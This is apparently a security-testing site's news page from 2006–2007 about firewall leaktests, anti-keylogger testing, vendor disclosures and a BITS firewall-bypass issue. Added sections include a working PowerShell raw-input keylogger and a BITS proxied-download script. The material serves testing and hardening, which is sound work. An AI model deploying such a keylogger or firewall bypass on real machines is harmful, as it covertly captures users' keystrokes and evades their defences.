December 05 2007 : Anti-Keylogger Tester (AKLT) updated to 3.0

new keylogging method added :

Someone told me about an apparently new keylogging method being discussed at Wilders Security Forums. The method used by the testing tool in that thread is based on the GetRawInputData() API and bypasses some HIPS (fortunately, some HIPS still detect and block it).

That was the first time I had heard of it, and from what we can see, the same goes for some security vendors. However, I found references to this keylogging method going back to 2005. Malware writers may therefore have known about it for two years, which would explain why some HIPS already recognise and detect it.

I have added this method to AKLT myself, with the same purpose as the last build: completeness. A raw-input keylogger registers itself with RegisterRawInputDevices() as a sink for keyboard input and then receives a WM_INPUT message for every keystroke on the desktop, without installing any hook or polling the key state. Moreover, AKLT does not require Microsoft .NET at all, unlike the tool mentioned in the thread above, so everyone can test their security software without installing third-party libraries. Please note that this new method, GetRawInputData, is only available on Windows XP and newer OS such as Vista (the test button will be greyed out on Windows 2000 and earlier).
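As an added illustration (this is not AKLT's code, nor the code from the thread above), the following PowerShell script registers itself as a raw-input sink for all keyboards and prints each keystroke delivered to it through GetRawInputData(), whatever window has the focus. It assumes Windows PowerShell 5.1 with .NET on Windows XP or later (so, unlike AKLT, it does depend on .NET); the choice of F12 as the stop key is an arbitrary assumption. Run it under your HIPS and type in another window: if the keys show up, the HIPS does not cover this method.

```powershell
# Added example, not AKLT's code: a raw-input keylogger test.
# No SetWindowsHookEx, no DLL injection, no polling: the process registers a
# keyboard "sink" and Windows posts it a WM_INPUT message for every keystroke.
$source = @'
using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;

public class RawKeySink : NativeWindow
{
    [StructLayout(LayoutKind.Sequential)]
    struct RAWINPUTDEVICE { public ushort UsagePage; public ushort Usage; public uint Flags; public IntPtr Target; }

    [DllImport("user32.dll", SetLastError = true)]
    static extern bool RegisterRawInputDevices(RAWINPUTDEVICE[] devices, uint count, uint size);

    [DllImport("user32.dll")]
    static extern uint GetRawInputData(IntPtr hRawInput, uint command, IntPtr data, ref uint size, uint headerSize);

    const int    WM_INPUT         = 0x00FF;
    const uint   RID_INPUT        = 0x10000003;  // "give me the RAWINPUT structure"
    const uint   RIDEV_INPUTSINK  = 0x00000100;  // deliver input even when another window has the focus
    const uint   RIM_TYPEKEYBOARD = 1;
    const ushort RI_KEY_BREAK     = 1;           // RAWKEYBOARD.Flags bit: key released

    // RAWINPUTHEADER = dwType, dwSize, hDevice, wParam: 16 bytes on x86, 24 bytes on x64
    static readonly int HeaderSize = 8 + 2 * IntPtr.Size;

    public event Action<ushort> KeyDown;

    public RawKeySink()
    {
        CreateHandle(new CreateParams());    // hidden window whose only job is to receive WM_INPUT
        var dev = new RAWINPUTDEVICE[] {
            // HID usage page 1 (generic desktop), usage 6 (keyboard)
            new RAWINPUTDEVICE { UsagePage = 1, Usage = 6, Flags = RIDEV_INPUTSINK, Target = Handle }
        };
        if (!RegisterRawInputDevices(dev, 1, (uint)Marshal.SizeOf(typeof(RAWINPUTDEVICE))))
            throw new System.ComponentModel.Win32Exception(Marshal.GetLastWin32Error());
    }

    protected override void WndProc(ref Message m)
    {
        if (m.Msg == WM_INPUT)
        {
            uint size = 0;
            GetRawInputData(m.LParam, RID_INPUT, IntPtr.Zero, ref size, (uint)HeaderSize);  // query the size
            IntPtr buf = Marshal.AllocHGlobal((int)size);
            try
            {
                if (GetRawInputData(m.LParam, RID_INPUT, buf, ref size, (uint)HeaderSize) == size
                    && (uint)Marshal.ReadInt32(buf, 0) == RIM_TYPEKEYBOARD)
                {
                    // RAWKEYBOARD follows the header: MakeCode(2) Flags(2) Reserved(2) VKey(2) Message(4) ExtraInformation(4)
                    ushort flags = (ushort)Marshal.ReadInt16(buf, HeaderSize + 2);
                    ushort vkey  = (ushort)Marshal.ReadInt16(buf, HeaderSize + 6);
                    if ((flags & RI_KEY_BREAK) == 0 && KeyDown != null) KeyDown(vkey);
                }
            }
            finally { Marshal.FreeHGlobal(buf); }
        }
        base.WndProc(ref m);
    }
}
'@
Add-Type -TypeDefinition $source -ReferencedAssemblies System.Windows.Forms

$sink = New-Object RawKeySink
$script:stop = $false
$sink.add_KeyDown([Action[uint16]]{ param($vk)
    if ($vk -eq 0x7B) { $script:stop = $true }   # VK_F12 stops the test (arbitrary choice)
    else { Write-Host ("WM_INPUT: vkey 0x{0:X2} ({1})" -f $vk, [System.Windows.Forms.Keys]$vk) }
})

Write-Host "Type in any other window; press F12 to stop."
while (-not $script:stop) {
    [System.Windows.Forms.Application]::DoEvents()   # pump WM_INPUT to our WndProc
    Start-Sleep -Milliseconds 20
}
$sink.DestroyHandle()
```

The flag that turns this from a normal input API into a keylogger is RIDEV_INPUTSINK: without it, a window only receives raw input while it has the focus. A HIPS that wants to cover this method therefore has to look at RegisterRawInputDevices() calls whose target is a window that does not own the foreground, not merely at GetRawInputData() itself.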

You can download the new AKLT version. Click here to download AKLT v3.0




December 04 2007 : System Shutdown Simulator mirrored on Firewall Leak Tester

new HIPS testing tool hosted :

Denis Sazonov discovered a flaw in various HIPS and created a test tool on November 21 2007. I offered to host a mirror of his file on Firewall Leak Tester.

This tool, System Shutdown Simulator, exploits the system shutdown window, during which all applications, including security software, are closing themselves. That window can be paused and abused. Click here to download System Shutdown Simulator




October 24 2007 : Anti-Keylogger Tester (AKLT) updated

added two known keylogging methods :

Until now, I did not include keylogging methods using global hooks, as these are widely known and have been covered by all of the best-known security software for years. Global hooks are created with the SetWindowsHookEx() API and, depending on the kind of hook, may or may not inject a DLL into all running processes (a global WH_KEYBOARD hook needs a DLL that Windows maps into every process receiving keyboard input, whereas a WH_KEYBOARD_LL hook runs in the installing process and needs none).

However, for the sake of completeness, I thought adding the two tests would be a good idea. AKLT now offers 6 different keylogging tests, plus 2 screenshot tests, for a total of 8 security tests to check your security software and settings.

From the same viruslist.com article I mentioned in the previous news, among the known in-the-wild keyloggers, 66% use hooks, 29% use hookless/cyclical polling, and 5% use a driver:

Global hook: 66%
Cyclical polling: 29%
Driver based: 5%

That means that AKLT v2.5 lets you test the behaviour of 95% of the in-the-wild keyloggers. For the remaining 5%, prevent driver loading by running under a limited user account, or by using a HIPS (once a driver is loaded, it can do much more than just keylogging).

There is a new AKLT Guide which explains how to use AKLT, and what kind of results you can expect.

Click here to download AKLT v2.5




October 19 2007 : new Anti-Keylogger Tester (AKLT) version

new keylogging method :

From this viruslist.com article written in March 2007 (by Nikolay Grebennikov, Kaspersky Lab), we can see that almost 50% of the malware detected by Symantec aims at harvesting data from the infected computer, keylogging being one of the methods used. Keylogging is therefore a serious issue (needless to say, even more so in corporations).

AKLT v2.0 is a new version adding a new keylogging function based on the GetKeyboardState() API. When I tested AKLT v2.0 in September against 13 different HIPS and/or dedicated anti-keylogging products, 10 of them (77%) failed at least one of the four keylogging methods, and 8 of them (61%) failed the new method.

Failing at least one test: 77%
Failing the new test: 61%
Passing all tests: 23%

It is very surprising that something known for years, like keylogging, still seems to work successfully in most cases.

Given such statistics, on September 28 2007 I sent a notice to the following seven security vendors: SysSafety (System Safety Monitor), Kaspersky Lab (Kaspersky Internet Security), GhostSecurity (AppDefend), Comodo (Comodo Firewall), ISecSoft (ProSecurity), Tall Emu (OnlineArmor), and SoftSphere Technologies (DefenseWall). I have also posted a version of AKLT to Malware-Research, a private forum for security vendors.

The following 3 products were already passing all of the AKLT keylogging methods before I contacted any security vendor: System Safety Monitor 2.4.0.619 beta, Comodo Firewall 3.0.9.229 beta, and OnlineArmor 2.1.0.9.

The following 3 security software vendors have found a fix to detect and block the new keylogging method. The fixed release is either already available or will be very shortly:
ProSecurity, DefenseWall, Kaspersky KAV/KIS.
GhostSecurity, maker of AppDefend, answered but did not give any date for the fix. SnoopFree was already failing AKLT v1.0 (the DirectX test). I emailed them for the first time, simply asking whether they plan to improve their product or not. I have not received any reply as of yet.

The following fail at least one test and were not contacted: EQSecure, ThreatFire, Advanced AntiKeylogger 3.7, Anti-Keylogger Shield 2.3, PrivacyKeyboard/Anti-Keylogger 7.4. I did not contact them for various reasons, one of them being that some are unknown to me and I do not know whether I can trust them. Any of these software makers can contact me to be added to my "contact list" for future tool or leaktest releases. Please note that some of these dedicated anti-keyloggers were picked at random on the Internet; I have no idea whether they can be trusted or not.

If you want to test yourself, download AKLT v2.0.




September 26 2007 : New document published : Securing Windows - PART II

Guide to increase your security on Windows :

I have written another guide, which you can find on the documents page, following on from "Securing Windows - Part I" (Securing Windows - PART 2 direct link).

This document is aimed at helping you further increase your Windows security by adding security software and using advanced Windows security features. It is also meant as a discussion exercise about how much security is too much.

If you do not know how to fully secure your computer, or if you have been unsuccessful at it, this guide is for you. However, please note that the method described in this guide is just one way to achieve your goal, not the only one possible. It is impossible to give the "best" universal way that works for everyone and fits every context.

As usual, if you find any error or mistake in the document, please contact me so I can look into it.




March 14 2007 : Vista's security impact on the leaktests

New article:

The new Microsoft operating system, Windows Vista, comes with many new security features. The question that arises is how these features will stand against the leaktests. We can also wonder whether current leaktest tricks may simply be incompatible with Vista. Having personally used Vista for more than a month, I wanted to know how secure Vista was by default.

You can read the resulting article Vista's security impact on the leaktests to discover some answers about these questions.

Of course Vista is still new and fairly recent, and we are far from having discovered everything about it. As with any OS release, we can bet that interesting discoveries will be made in the near future.





March 10 2007 : new webhoster

upgrade :

I have switched again to another webhoster. The previous one had very bad support, taking weeks to answer you, and sometimes not answering at all. They also had a hard time understanding why some leaktests are detected as malware when they are not. While in the end everything was successfully solved, I did not want to stay with them.

As with any move, some things might get lost, so if you find any dead link or anything missing, please send me a notice.

I do not send a newsletter just for this, so it is normal if you were not emailed.






January 13 2007 : New tool released : Anti-Keylogger Tester

Test your HIPS's anti-keylogging functionality :

Some trojans include keylogging functionality, which can steal confidential information as you type it, before sending it out over the network. To fight this threat, many HIPS, and also dedicated anti-keylogger software, now provide anti-keylogger features. However, there are many ways to monitor the keyboard, and not all HIPS cover all of them.

Anti-Keylogger Tester (AKLT) is a tool using 3 different methods to monitor your keyboard (GetKeyState, GetAsyncKeyState, and DirectX) that lets you check your defences. AKLT does not try to monitor your keyboard using a global hook, nor any DLL/code injection, as these methods are widely known and covered by all the security software I have tested.

Additionally, AKLT provides two ways of taking screenshots, as a keylogger or a trojan could. I am not aware of any HIPS providing screenshot protection, but in case one of your security products claims to provide such a feature, you will be able to test it thanks to AKLT.

On December 31 2006 I contacted the following security vendors and gave them a version of AKLT: SysSafety (System Safety Monitor), Kaspersky (KIS 6.0), GhostSecurity (AppDefend), Comodo, Agnitum, ProSecurity, and OnlineArmor. I have also posted a version of AKLT to Malware-Research, a private forum for security vendors. I was not aware of any HIPS providing protection against AKLT's third (DirectX) method, which is why I contacted the software vendors first so that a protection could be found. Agnitum and Comodo only make personal firewalls and do not offer a HIPS for now, but I contacted them just in case, to raise awareness of the issue.

The following HIPS vendors have released a version of their software including a fix to detect and block AKLT's third keylogging method. You can download them now:
ProSecurity v1.26, System Safety Monitor 2.3.0.608 beta.

The following security vendors do not yet have a fix, but wanted to express themselves on this issue:
Comodo
Comodo Firewall version 3.0, available March, will contain full HIPS functionality and will detect these tests. However, the keylogging tests you have developed do not fall within the scope of Comodo Firewall 2.3 as it was not designed to include any HIPS functionality.

Comodo Firewall 2.3 does, however, detect keylogging programs should they attempt to make an outgoing connection to the Internet, and so prevents them from compromising user privacy.

OnlineArmor
We've tested the latest internal build of Online Armor v2 against AKLT and all of the tests described will be passed before release. We already have working code for getXXXKeystate detection and can detect (but not block yet) the DirectX keylogging. This will be corrected before release.

Kaspersky should release a beta soon fixing this issue, probably next week.


You can view and download AKLT at the following page.




November 26 2006 : New document published : Securing Windows

Guide for intermediate user :

I have written a guide, which you can find on the documents page, to help people learn the basics of configuring and securing their Windows. This guide does not talk at all about which application to install, which antivirus, or which firewall; instead it explains how to manually configure Windows to increase its security. Among other subjects, it covers updates, passwords, services, and privileges (restricted rights).

This guide is designed for beginner to intermediate users; if you already know perfectly well how to lock Windows down, this document is not for you.

If you find any mistake in the document (grammar or technical error) please report it to me.




October 11 2006 : Agnitum Outpost v4.0 has been released

anti-leak feature added :

As you may know, Outpost v4.0 was released recently. It is a great improvement over the previous versions, and it now has a built-in "anti-leak" feature based on the leaktests from Firewall Leak Tester.

According to Agnitum's description, this feature is meant to handle all known leaktests. I am glad there are firewall vendors out there focusing on their users' security by taking the leaktests seriously. Of course, this feature can be disabled if you do not need it.

Below is a quote from Agnitum :
We are very proud to release Outpost Firewall Pro 4.0 because Agnitum specialists have once again managed to prove their expert level in computer security. Our mission is to create high-end products and with the recent release it has been fully accomplished.

We designed the fourth version from the get-go to satisfy the top six critical security requirements for firewalls: inbound & outbound protection, program behavior monitoring, internal protection against unauthorized termination, automatic configuration for Internet-accessing apps, extensive activity monitoring features.

Our efforts have led to a 100% pass rate for all existing leaktests. That highlights the exceptional ability of Outpost Firewall Pro to withstand serious malware attacks aiming to steal personal data from a user's PC. Naturally, security-conscious folks will be looking to confirm these results independently, and in that respect we would like to thank Mr. Guillaume Kaddouch for his efforts of bringing a dedicated testing ground here at firewallleaktester.com. We hope users will like the unmatched performance of the new Outpost.


Besides the anti-leak feature, Outpost has some other great ones, such as a plugin against malformed DNS queries, or a plugin to protect your computer from LAN attacks such as ARP spoofing. For those connected directly to the Internet, the Attack Detection plugin is able to detect port scans and various TCP attacks.

Outpost 4.0 is definitely one firewall to try if you do not have one yet or if you are not satisfied with your current one.

Finally, as a last note, another firewall, a free one, is also progressing well in the leaktest fight and is used by some users: Comodo. For those wondering, all of the latest firewall versions will be tested in the next leaktest testing session, though I have no date yet.




October 10 2006 : Microsoft taking back control of its WGA

RemoveWGA forbidden :

Microsoft complained to my webhoster about RemoveWGA.exe hosted in my tools folder, and put pressure on me to remove it. I am obliged to comply and have no choice about it.

I do not quite understand them, as RemoveWGA is only designed to help users who have a legitimate Windows copy. Moreover, RemoveWGA is now widespread and available from many mirrors and on various P2P networks, so removing it from my website will not do that much.

They probably want to send a message, but I am unsure whether it will really be beneficial in the end. I let everyone form their own opinion.




October 07 2006 : New test board, "Firewall termination defense" testing

38 termination methods used :

A new firewall termination test page is born!

Leaktest methods can be used to silently bypass your firewall, but what if it can simply be terminated and disabled, and your data then sent out normally without using any leaktest trick? Some malware in the wild tries to terminate various antivirus and firewall products, so I thought it might be worth adding a test for that too.

13 firewalls are tested against 38 termination methods, which means at least 500 test runs, as some tests are repeated many times to ensure the correctness of the result. This is a great amount of work, which explains why I did not test every known firewall available, and why I did not use every termination tool I have found. However, I plan to add more tools and firewalls to the test bed later; this is just the beginning.

For the tests I used public termination tools, freely available to anyone, and thus to the firewall vendors themselves. However, as with the leaktests, all of the termination methods used are only the known ones; unknown and unpublished ways of termination probably exist. Always think about what might happen while securing yourself (e.g. monitoring process execution to block potential unknown threats), and not only about what is currently known.




August 1 2006 : RemoveWGA not helping piracy

piracy is illegal :

I have received some complaints from users who said that RemoveWGA was not working on their system. RemoveWGA was saying that WGA Notification was not active, despite the WGA popups telling the user their Windows was pirated.

After investigation, it appears that RemoveWGA works well on legitimate Windows copies (it detects the WgaLogon DLL being loaded) but is unable to see the DLL on pirated Windows, hence saying that WGA Notification is not active. In fact, Windows seems to purposefully cloak the DLL from RemoveWGA if it is running on a pirated copy.

At first, as I did not know that RemoveWGA was failing only on pirated OS, I made a fix to make it work in all cases and posted it on a forum. After discovering that only pirates had the problem, I quickly removed the fix and the manual steps to disable and remove the WGA Notification tool on pirated Windows.

While I still think that honest people wrongly flagged as pirates should be helped, they are a minority and should contact Microsoft. Real pirated copies should not receive any help. I do not support piracy, I am strongly against it, and I will stand by this.

RemoveWGA is made to help legitimate Windows users remove the WGA Notification update if they installed it inadvertently and are concerned about their privacy and security. It will not work on non-genuine copies.

If you are running a pirated Windows, you must buy a valid and legitimate licence.




July 29 2006 : new RemoveWGA version out

RemoveWGA 1.2 release :

This version cleanly removes both the WGA Notification 'Pilot' version and the 'Final' version; it should theoretically no longer be necessary to unload WGA Notification live from memory and risk a blue screen (BSOD).

If RemoveWGA finds the final WGA Notification version, it "disables" the file WgaLogon.dll by denying the SYSTEM account access to it (using the Windows tool cacls.exe). After a reboot, it tries to remove WGA Notification, and only then, if it cannot, does it offer you the brutal WGA removal.

RemoveWGA 1.2 has been successfully tested against the pilot and final versions of WGA Notification on both Windows XP SP2 Professional and Home Edition (clean removal).

To sum up, RemoveWGA now uses 3 different WGA removal methods, depending on the WGA version installed on your computer. The last one (BSOD) should not be used, except maybe for future WGA versions if the clean removal methods fail. If that happens, RemoveWGA will pop up a warning and ask you before trying anything.




June 30 2006 : new RemoveWGA version out

Windows Genuine Advantage Notification UPDATE :

On June 27 2006 Microsoft released an update to its WGA Notification package. Officially, it phones home a lot less (no longer at every boot), and the EULA describes more clearly the purpose of this "update".

However, what you are not told is that this updated version also prevents RemoveWGA from removing the WGA Notification tool. Indeed, RemoveWGA 1.02 will return an error saying "WgaLogon.dll or WgaTray.exe cannot be set for deletion at next reboot. Operation aborted".

Microsoft wants to keep control of WGA, and they provide a guide to manually uninstall the WGA Notification PILOT version themselves: Official Microsoft Removal Guide. Unsurprisingly, the method offered is complicated for a standard home user with no IT knowledge and requires 3 restarts of your computer. I do not understand the logic behind this; it would have been far easier to provide an "uninstall" button instead of a guide that some clueless users will probably not be able to follow, or will simply give up on.
Also, from the web page: "Important: These instructions have not been tested on the general release version of the WGA Notifications. Therefore, these instructions are not supported." This probably means that the latest WGA Notification update, being the final release, cannot be removed with this guide?

Finally, I am releasing RemoveWGA 1.1 to remove the latest WGA Notification update. However, this time, if it detects that it is blocked from doing it the proper way (unlike with the previous WGA version), it will offer you a "forced" live unloading of WGA from memory.

Removing WGA Notification this way will crash your computer!

Indeed, WgaLogon.dll is unloaded from the winlogon.exe process, which crashes a few seconds afterwards, after the WGA files have been deleted. You must do a hard reset of your computer quickly after the "successful" popup. I am not happy with this method, but it removes WGA Notification instantly.

YOU SHOULD NOT USE THIS METHOD IF YOU DO NOT HAVE BACKUPS

As with any BSOD, data loss can occur and a check disk may be needed. If you are unsure of what you are doing, do NOT do this.

I provide the RemoveWGA 1.1 version for people who want to get rid of WGA Notification at all costs. I used it multiple times on my test computer (I willingly crashed it many times) without any trouble. But keep in mind that halting your system in a bad state can lead to data loss. Do not come after me if you lose any data.

Finally, it is possible that the next update will not be removable by RemoveWGA; if Microsoft wants to lock WGA down, they can. If they do, there will always be manual ways, such as booting from a BartPE CD. Until the day WGA Notification becomes mandatory (if it happens), and uninstalling it means you will not be able to install any security updates (do not worry, that is not the case yet).





June 23 2006 : new webhoster for firewall leak tester

upgrade :

I have upgraded the server hosting the website to a newer one able to handle more traffic. My previous webhoster was not able to handle the recent traffic spike caused by the RemoveWGA tool release on my website.

Everything should have been restored correctly (databases, downloads, links), but if you find anything wrong anyway (dead links, errors, etc.), please report it to me by writing to webmaster@firewallleaktester.com
A minor issue remains due to the new server's configuration: every mail sent by Firewall Leak Tester will have "anonymous@firewallleaktester.com" as sender address.
I am working on this, but it does not affect the website's functionality. I do not wish to publish any news on the newsletter until it is solved.

Finally, this new dedicated server costs me much more than the previous one, and donations are still appreciated (donation possible via a PayPal account or directly online with a credit card).

I wish you a good surfing.




June 10 2006 : Windows BITS service bypasses default firewall rules

BITS service opens a big hole on your computer :

1 - BITS explanation :

The BITS service is used by the Automatic Updates feature to check for and download updates if available. Although used by default only by Windows, this service can be managed/controlled by any running application.

From Microsoft :
Background Intelligent Transfer Service (BITS) asynchronously transfers files in the foreground or background, throttles the transfers to preserve the responsiveness of other network applications, and automatically resumes file transfers after network disconnects and machine restarts. Applications use the BITS application program interface (API) to create transfer jobs and to monitor the progress of jobs in the transfer queue. The BITS API is included in the Microsoft® Platform Software Development Kit (SDK).


2 - issue/consequence :

Any application can create a "job" and request the download of some files. The BITS service (hosted in svchost.exe on Windows XP, and presumably services.exe on Windows 2000) then acts as a proxy: it downloads the files and saves them where requested. From your firewall's point of view, it is the service that is accessing the network, not the application that asked for the file.

This issue is NOT a vulnerability; this is a Windows feature, and the BITS service is expected to behave like this. This is also NOT a firewall vulnerability. By default you may have fully allowed svchost.exe to access the Internet (ports 80 and 443) if you enabled Automatic Updates, but knowing this issue, you may now want to reconfigure it.

The original discoverer, who reported this issue to me on April 28, is Tim Fish (info@fi5h.co.uk).

3 - testing yourself :

If you wish to test it yourself, you can download the BITSADMIN.EXE utility from Microsoft : Windows XP Service Pack 2 Support Tools

Then, type the following commands at a command prompt:
bitsadmin /create JOBNAME
bitsadmin /addfile JOBNAME http://www.firewallleaktester.com/tools/wwdc.exe c:\wwdc.exe
bitsadmin /resume JOBNAME
bitsadmin /info JOBNAME
bitsadmin /complete JOBNAME


Once the utility is downloaded, if you do not want to type all of these lines many times while testing, you can download the following GUI I quickly made: BITS_tester.exe.
Put both files, BITS_tester and BITSADMIN, in the same folder before running the tool (not on your desktop, it seems not to work there).
BITS_tester is NOT a leaktest; it is simply a GUI to control the utility from Microsoft.
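The same test from PowerShell, as an added example (this is not the page's BITS_tester): it queues the download through the BitsTransfer module and prints which process actually opens the connection. The source URL is the one from the bitsadmin lines above; using a temporary file as destination is an assumption.

```powershell
# Added example, not the page's BITS_tester: queue a BITS download from PowerShell
# and show the two processes involved, the one that asks and the one the firewall sees.
Import-Module BitsTransfer

$source      = 'http://www.firewallleaktester.com/tools/wwdc.exe'   # URL from the page's bitsadmin lines
$destination = Join-Path $env:TEMP 'bits-leaktest.bin'               # assumption: any writable path will do

function Test-BitsProxyDownload {
    param([string]$Source, [string]$Destination)
    # bitsadmin /create + /addfile + /resume in one call: the job is queued, nothing is downloaded by us
    $job = Start-BitsTransfer -Source $Source -Destination $Destination -Asynchronous -DisplayName 'LeakTest'
    try {
        # Who the firewall sees: not this process, but the svchost.exe instance hosting the BITS service
        $bitsPid = (Get-CimInstance Win32_Service -Filter "Name='BITS'").ProcessId
        Write-Host ("requester : PID {0} ({1})" -f $PID, (Get-Process -Id $PID).ProcessName)
        Write-Host ("transferer: PID {0} ({1})" -f $bitsPid, (Get-Process -Id $bitsPid).ProcessName)

        while ($job.JobState -in 'Queued', 'Connecting', 'Transferring') { Start-Sleep -Seconds 1 }   # bitsadmin /info
        if ($job.JobState -eq 'Transferred') {
            Complete-BitsTransfer -BitsJob $job                     # bitsadmin /complete: commit the file to disk
            return (Get-Item $Destination).Length
        }
        # Anything else (Error, TransientError after a firewall block, ...) is a failed leak
        Write-Host ("job ended in state {0}: {1}" -f $job.JobState, $job.ErrorDescription)
        Remove-BitsTransfer -BitsJob $job                           # bitsadmin /cancel
        return 0
    } finally {
        Remove-Item $Destination -ErrorAction SilentlyContinue
    }
}

$bytes = Test-BitsProxyDownload -Source $source -Destination $destination
Write-Host "downloaded $bytes bytes through the BITS service"
```

If your firewall prompts at all, the prompt names svchost.exe, not powershell.exe; a rule that already lets svchost reach any address on port 80 produces no prompt and the file simply appears. With an administrator shell, `Get-BitsTransfer -AllUsers` lists jobs queued by every account on the machine, which is a quick way to spot a job you did not create.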

4 - Solution :

The only way to prevent abuse is to restrict, in your firewall, the IPs that svchost.exe (or services.exe) is allowed to access. On my side, I need to allow these IP ranges (text file):




5 - Example (with Jetico) :

The following is done with Jetico, but it can be done with any firewall. Refer to your help file or your support forum if you do not know how to create network rules with your firewall.

You first need to create a new table, inside which you have to add the following network rules (original picture):


Then, in the Table, add a line like this :


Now, if you run BITS_tester, Jetico will ask for network access for both BITS_tester and BITSADMIN, and at the end will (as should be the case for every firewall) ask about an outbound connection to firewallleaktester:


6 - Conclusion :

You should never "Allow all" for an application, even if you trust it, and especially not for system processes. Always restrict it to the ports AND IP addresses it needs; that includes your ISP's DNS server IPs, for instance. SVCHOST.EXE on Windows XP is a host process for many features and can be abused (as with this BITS issue, and remember the DNStester leaktest too). Consequently you must restrict it tightly so as not to open doors to potential malware. Every firewall shipping with a rule for svchost that allows ports 80 and 443 to every IP can be bypassed.

Also note that the IP ranges given may not be complete; it is possible that in your country svchost needs to access other ranges. If your firewall warns you about access to an IP not in the given ranges, you can find the range the IP belongs to with the "IPWHOIS Lookup" at http://www.dnsstuff.com/. Simply enter the IP in the box and the website will give you the associated IP range and CIDR.

Until now I have only talked about downloading, but the latest version of the BITS service can be used to upload files as well, to a machine running the IIS web server (with the BITS server extension).

As a side note, those who say you should not be infected in the first place are of course right. But a firewall is still needed to control legitimate Windows components or unwanted application behaviour (e.g. MS Word accessing the net). Also, in case something gets planted on your PC, having restricted everything to only what it needs will mitigate the consequences. It is like the airbag in your car: theoretically you should not need it, because you drive well and not too fast. But if you have an accident anyway, having an airbag will reduce the damage.

Finally, disabling the Automatic Updates service and the BITS service altogether is not a solution: a malware could simply restart them before using them. I do not advise disabling Automatic Windows Updates at all, but if you go that way, do not forget to also block svchost.exe or services.exe in your firewall (if you are using DHCP, create a rule allowing local UDP port 68 to talk to remote port 67 at 255.255.255.255 for the initial broadcast, and to your DHCP server's address, since lease renewals are unicast).
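The rules of sections 4 and 6 expressed for the built-in Windows Firewall, as an added example that is not part of the page (the page's own screenshots are for Jetico). It assumes the NetSecurity module (Windows 8 / Server 2012 and later) and an elevated PowerShell; the two address lists are placeholders from the TEST-NET ranges, not Microsoft's real update servers, to be replaced by what your firewall log shows svchost actually contacting and by your ISP's resolvers.

```powershell
# Added example, not from the page: tighten svchost.exe in the Windows Firewall
# the way sections 4 and 6 do it for Jetico. Run from an elevated PowerShell.
$UpdateRanges = @('203.0.113.0/24', '198.51.100.0/24')   # placeholder: Windows Update / BITS server ranges (fill from your logs)
$DnsServers   = @('192.0.2.53')                          # placeholder: your ISP or LAN DNS servers
$svchost      = "$env:SystemRoot\System32\svchost.exe"

# The weak rule many firewalls ship with: svchost may talk to ANY address on 80/443,
# so every BITS job queued by any process rides through it. Shown commented out.
#   New-NetFirewallRule -DisplayName 'svchost web (weak)' -Direction Outbound -Action Allow `
#       -Program $svchost -Protocol TCP -RemotePort 80, 443 -RemoteAddress Any

# Hardened: deny outbound by default, log the drops, then allow svchost per hosted
# service, port AND address. (Every other program's outbound traffic is blocked too
# until you add a rule for it; that is the point of the page's "never Allow all".)
Set-NetFirewallProfile -Profile Domain, Private, Public -DefaultOutboundAction Block -LogBlocked True

New-NetFirewallRule -DisplayName 'svchost: Windows Update' -Direction Outbound -Action Allow `
    -Program $svchost -Service wuauserv -Protocol TCP -RemotePort 80, 443 -RemoteAddress $UpdateRanges
New-NetFirewallRule -DisplayName 'svchost: BITS' -Direction Outbound -Action Allow `
    -Program $svchost -Service BITS -Protocol TCP -RemotePort 80, 443 -RemoteAddress $UpdateRanges
New-NetFirewallRule -DisplayName 'svchost: DNS client' -Direction Outbound -Action Allow `
    -Program $svchost -Service Dnscache -Protocol UDP -RemotePort 53 -RemoteAddress $DnsServers
# DHCP as in the last paragraph above: local UDP 68 -> remote 67. The initial DISCOVER goes to
# 255.255.255.255, but lease renewals are unicast to the DHCP server, so the remote address is
# left open and the rule is pinned to the Dhcp service instead.
New-NetFirewallRule -DisplayName 'svchost: DHCP client' -Direction Outbound -Action Allow `
    -Program $svchost -Service Dhcp -Protocol UDP -LocalPort 68 -RemotePort 67 -RemoteAddress Any

# Verify what got installed: every svchost rule with its port and address scope.
Get-NetFirewallRule -DisplayName 'svchost:*' | ForEach-Object {
    $addr = $_ | Get-NetFirewallAddressFilter
    $port = $_ | Get-NetFirewallPortFilter
    '{0,-26} {1,-4} remote port {2,-7} remote address {3}' -f $_.DisplayName, $port.Protocol,
        ($port.RemotePort -join ','), ($addr.RemoteAddress -join ',')
}
# Re-run the BITS test afterwards: a job to a host outside $UpdateRanges should sit in
# TransientError, and %SystemRoot%\System32\LogFiles\Firewall\pfirewall.log should show
# the DROP for svchost.exe rather than for the program that queued the job.
```

The `-Service` parameter is what makes this stricter than a per-program rule: the firewall matches on the service SID inside the shared svchost.exe, so a rule written for wuauserv does not also open the door for the BITS service (or for any other service hosted in the same process). As the page notes for its own list, the address ranges are the moving part; Windows Update has since added Delivery Optimization (DoSvc) and a large set of CDN addresses, so the list must follow whatever your firewall log shows.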





June 8 2006 : two new leaktests added

Comodo Parent Injection Leak Test & PCFlank Leaktest :

I have added two leaktests to the site: the CPIL leaktest from Comodo (which, by the way, has released version 2 of its firewall, said by Comodo to be a lot better regarding leaktests), and the PCFlank leaktest from PCFlank, a well-known security website.

The methods used are known (DLL/code injection, OLE browser manipulation), but they are used slightly differently and are sometimes not handled by the various personal firewalls.

However, I do not currently have the time to test them against every firewall, so I have not updated the results board.




May 21 2006 : KIS & KAV 6.0 released

Antivirus and Firewall available :

The Firewall Leak Tester "Best Choice" awarded Kaspersky Internet Security 6.0 (KIS 6.0) was commercially released on May 15 2006, as well as Kaspersky Antivirus 6.0. Both are available in trial or commercial version at: http://www.kaspersky.com/
They were previously in beta. The latest commercial build is 6.0.0.300.

The other "Best Choice" awarded software, Ghost Security Suite (AppDefend & RegDefend), is still in beta for now; I have no news and no expected release date as of now.




